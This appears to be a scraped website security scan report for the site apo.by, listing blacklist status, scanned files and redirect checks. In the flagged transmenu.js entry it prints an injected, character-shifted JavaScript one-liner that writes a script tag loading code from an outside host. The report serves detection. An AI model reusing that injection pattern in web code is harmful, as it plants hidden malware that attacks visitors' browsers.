Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=apo.by
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://apo.by/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.apo.by/ | 200 OK Content-Length: 20551 Content-Type: text/html | clean |
http://apo.by/modules/ja_transmenu/transmenu.js | 200 OK Content-Length: 28390 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) TransMenu.spacerGif = "img/x.gif"; TransMenu.dingbatOn = "img/arrow.png"; TransMenu.dingbatOff = "img/tabarrow.png"; TransMenu.dingbatSize = 14; TransMenu.menuPadding = 0; TransMenu.itemPadding = 3; TransMenu.shadowSize = 2; TransMenu.shadowOffset = 3; TransMenu.shadowColor = "#888"; TransMe var el; for(var d = document.all.length;d--;){ el = document.all[d]; for(var c = cearElementProps.length;c--;){ el[cearElementProps[c]] = null; } } }); } <!-- js-tools --> v=0;while(v<63)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00lv{nfolp.sbmmz/dpn0uftu0tubu/qiq#?=0tdsjqu?'.charCodeAt(v++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://www.apo.by/index.php | 200 OK Content-Length: 20550 Content-Type: text/html | clean |
http://www.apo.by/images/stories/doc/Programma_APO.pdf | 200 OK Content-Length: 52645 Content-Type: application/pdf | clean |
http://www.apo.by/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.apo.by/index.php?option=com_artbannersplus&task=clk&id=16 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 17 Jul 2014 05:17:26 GMT Location: http://Bannerapo.gif Server: nginx/1.4.4 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=Windows-1251 Set-Cookie: 2434c2e4b7bfe9ead90ef54743605ea6=-; path=/ X-Powered-By: PHP/5.3.28 | clean |
http://bannerapo.gif/ | 500 Can't connect to bannerapo.gif:80 (Bad hostname) Content-Length: 158 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: apo.by
Result:
GET / HTTP/1.1
Host: apo.by
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: apo.by
Referer: http://www.google.com/search?q=apo.by
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: apo.by
Referer: http://www.google.com/search?q=apo.by
Result:
The result is similar to the first query. There are no suspicious redirects found.